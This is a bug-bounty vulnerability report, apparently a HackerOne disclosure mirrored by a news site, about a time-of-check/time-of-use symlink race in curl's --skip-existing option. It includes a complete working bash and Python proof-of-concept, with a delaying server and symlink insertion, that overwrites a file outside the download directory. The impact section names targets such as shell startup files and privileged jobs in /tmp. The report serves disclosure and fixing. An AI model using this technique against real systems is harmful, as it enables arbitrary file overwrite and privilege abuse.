{“lastseen”:”2026-05-20T21:28:14″,”description”:”## Summary:\\nThe curl CLI’s `–skip-existing` option performs a separate existence check before the download body is written. In the verified path, curl first calls `stat()` on the target pathname and decides \\”the file does not exist, so continue\\”, but it does not keep an fd bound to that decision. The actual output file is only opened later, when the first response body bytes reach the write callback, and the normal clobbering path uses `fopen(\\”wb\\”)`, which follows symlinks. An attacker who can modify the download directory after the request starts can therefore create a same-name symlink in the gap between the check and the later open, causing curl to overwrite the symlink target instead of a file inside the intended directory. A cooperating or malicious server can make this race reliable by accepting the request and intentionally delaying the response body until the symlink has been planted. This is a real filesystem write-redirection bug in curl’s `–skip-existing` logic, not just caller misuse.\\n\\n## Affected version\\nValidated locally on:\\n\\n`curl 8.21.0-DEV (x86_64-pc-linux-gnu) libcurl\/8.21.0-DEV OpenSSL\/3.0.13 zlib\/1.3 brotli\/1.1.0 zstd\/1.5.5 libpsl\/0.21.2`\\n\\nPlatform:\\n\\n`Linux L-G4274LMD-1548 6.6.87.2-microsoft-standard-WSL2 x86_64 GNU\/Linux`\\n\\nThis appears to affect curl CLI builds that include `–skip-existing`. That option was added in `8.10.0`, and the reproduced bug is in that option’s current implementation path.\\n\\n## Steps To Reproduce:\\n1. From the repository root, run the following self-contained script. It does not rely on any local PoC file. It creates a world-writable shared directory, starts a local HTTP server that delays the body, runs `curl –skip-existing -O`, inserts the symlink only after the request has already started, and then confirms that a file outside the shared directory was overwritten:\\n\\n“`bash\\nset -euo pipefail\\n\\nROOT=\\”$PWD\\”\\nCURL_BIN=\\”\\”\\nfor candidate in \\”$ROOT\/src\/curl\\” \\”$ROOT\/build-h2-asan\/src\/curl\\” \\”$(command -v curl)\\”; do\\n if [ -n \\”${candidate:-}\\” ] \\u0026\\u0026 [ -x \\”$candidate\\” ]; then\\n CURL_BIN=\\”$candidate\\”\\n break\\n fi\\ndone\\nif [ -z \\”$CURL_BIN\\” ]; then\\n echo \\”could not find a curl binary to test\\” \\u003e\\u00262\\n exit 1\\nfi\\n\\nTMPDIR=\\”$(mktemp -d)\\”\\ntrap ‘jobs -p | xargs -r kill 2\\u003e\/dev\/null || true; rm -rf \\”$TMPDIR\\”‘ EXIT\\nSHARED=\\”$TMPDIR\/shared\\”\\nTARGET=\\”$TMPDIR\/target\\”\\nSIGNAL=\\”$TMPDIR\/signal\\”\\nmkdir -p \\”$SHARED\\” \\”$TARGET\\” \\”$SIGNAL\\”\\nchmod 1777 \\”$SHARED\\”\\nprintf ‘ORIGINAL\\\\n’ \\u003e \\”$TARGET\/important.txt\\”\\n\\ncat \\u003e\\”$TMPDIR\/server.py\\” \\u003c\\u003c’PY’\\nimport os\\nimport sys\\nimport time\\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\\n\\nport_file, ready_file, go_file = sys.argv[1:4]\\n\\nclass Handler(BaseHTTPRequestHandler):\\n def do_GET(self):\\n if self.path != \\”\/payload.txt\\”:\\n self.send_response(404)\\n self.end_headers()\\n return\\n open(ready_file, \\”w\\”).close()\\n while not os.path.exists(go_file):\\n time.sleep(0.02)\\n body = b\\”RACED-SKIP-EXISTING\\\\n\\”\\n self.send_response(200)\\n self.send_header(\\”Content-Length\\”, str(len(body)))\\n self.end_headers()\\n self.wfile.write(body)\\n\\n def log_message(self, *args):\\n pass\\n\\nserver = HTTPServer((\\”127.0.0.1\\”, 0), Handler)\\nwith open(port_file, \\”w\\”, encoding=\\”ascii\\”) as f:\\n f.write(str(server.server_port))\\n f.flush()\\nserver.serve_forever()\\nPY\\n\\npython3 -u \\”$TMPDIR\/server.py\\” \\\\\\n \\”$SIGNAL\/port\\” \\”$SIGNAL\/request.ready\\” \\”$SIGNAL\/send-body\\” \\u0026\\n\\nfor _ in $(seq 1 50); do\\n [ -s \\”$SIGNAL\/port\\” ] \\u0026\\u0026 break\\n sleep 0.1\\ndone\\n[ -s \\”$SIGNAL\/port\\” ] || { echo \\”server did not start\\” \\u003e\\u00262; exit 1; }\\nPORT=\\”$(cat \\”$SIGNAL\/port\\”)\\”\\n\\n(\\n cd \\”$SHARED\\”\\n \\”$CURL_BIN\\” -sS –skip-existing -O \\”http:\/\/127.0.0.1:$PORT\/payload.txt\\”\\n) \\u003e\\”$TMPDIR\/curl.stdout\\” 2\\u003e\\”$TMPDIR\/curl.stderr\\” \\u0026\\nCURL_PID=$!\\n\\nfor _ in $(seq 1 200); do\\n [ -e \\”$SIGNAL\/request.ready\\” ] \\u0026\\u0026 break\\n sleep 0.05\\ndone\\n[ -e \\”$SIGNAL\/request.ready\\” ] || { echo \\”curl never reached the request stage\\” \\u003e\\u00262; exit 1; }\\n\\nif [ -e \\”$SHARED\/payload.txt\\” ]; then\\n echo \\”payload.txt unexpectedly exists before the race is triggered\\” \\u003e\\u00262\\n exit 1\\nfi\\n\\nln -s ..\/target\/important.txt \\”$SHARED\/payload.txt\\”\\ntouch \\”$SIGNAL\/send-body\\”\\n\\nwait \\”$CURL_PID\\”\\n\\necho \\”curl binary: $CURL_BIN\\”\\necho \\”shared dir: $SHARED\\”\\necho \\”shared mode: $(stat -c ‘%A %a’ \\”$SHARED\\”)\\”\\necho \\”symlink target: $(readlink \\”$SHARED\/payload.txt\\”)\\”\\necho \\”victim body: $(cat \\”$TARGET\/important.txt\\”)\\”\\n\\nif [ \\”$(cat \\”$TARGET\/important.txt\\”)\\” = \\”RACED-SKIP-EXISTING\\” ]; then\\n echo\\n echo \\”BUG CONFIRMED: curl followed the post-check symlink and overwrote a file outside the shared directory.\\”\\nelse\\n echo\\n echo \\”PoC did not reproduce.\\” \\u003e\\u00262\\n exit 1\\nfi\\n“`\\n\\n2. Expected safe behavior:\\n – once curl decides \\”the file does not exist, continue\\”, a later attacker-created symlink should not be able to change the write target\\n – curl should either bind the decision to an already-open fd, or fail safely when the path has changed\\n\\n3. Observed vulnerable behavior:\\n – the script prints `BUG CONFIRMED`\\n – `shared\/payload.txt` remains a symlink to `..\/target\/important.txt`\\n – `target\/important.txt`, which lives outside the shared download directory, is overwritten with `RACED-SKIP-EXISTING`\\n\\n4. Relevant code path in the current tree:\\n – `src\/tool_operate.c`: `–skip-existing` checks `curlx_stat(per-\\u003eoutfile, \\u0026fileinfo)` and only sets a skip flag if the path already exists\\n – `src\/tool_operate.c`: if the file does not already exist, it leaves `outs-\\u003estream = NULL`\\n – `src\/tool_cb_wrt.c`: on first body write, curl calls `tool_create_output_file()`\\n – `src\/tool_cb_wrt.c`: the clobbering branch uses `curlx_fopen(fname, \\”wb\\”)`, which follows the attacker-inserted symlink\\n\\n5. Why the exploit is practical:\\n – the attacker does not need to win a tiny scheduler race\\n – the server can deliberately delay the first body bytes until after the local attacker inserts the symlink\\n – that makes the TOCTOU condition deterministic in shared or world-writable directories\\n\\n## Impact\\n\\n## Summary:\\nAn attacker who can modify the chosen download directory after curl starts the request can redirect the eventual download write into any filesystem target writable by the victim process. In the strongest real-world case, this means a local attacker can wait for a privileged or automated curl job that uses `–skip-existing` in `\/tmp`, a shared workspace, or another attacker-writable directory, then create the symlink after curl has already made its \\”file does not exist\\” decision. A malicious server can cooperate by delaying the response body until the symlink is in place, making exploitation reliable instead of probabilistic. The result is arbitrary file overwrite with attacker-controlled bytes relative to the victim process’s privileges. Practical targets include shell startup files, config files, build scripts, and other writable files outside the intended download directory.”,”published”:”2026-05-19T11:30:52″,”modified”:”2026-05-20T21:23:20″,”type”:”hackerone”,”title”:”curl: curl –skip-existing has a TOCTOU race that lets a post-check symlink redirect the later download write”,”source”:””,”references”:””,”id”:”H1:3747959″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3747959″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-20T21:28:14″,”description”:”## Summary:\\nThe curl CLI’s `–skip-existing` option performs a separate existence check before the download body is written. In the verified path, curl first calls `stat()`…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-55924","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n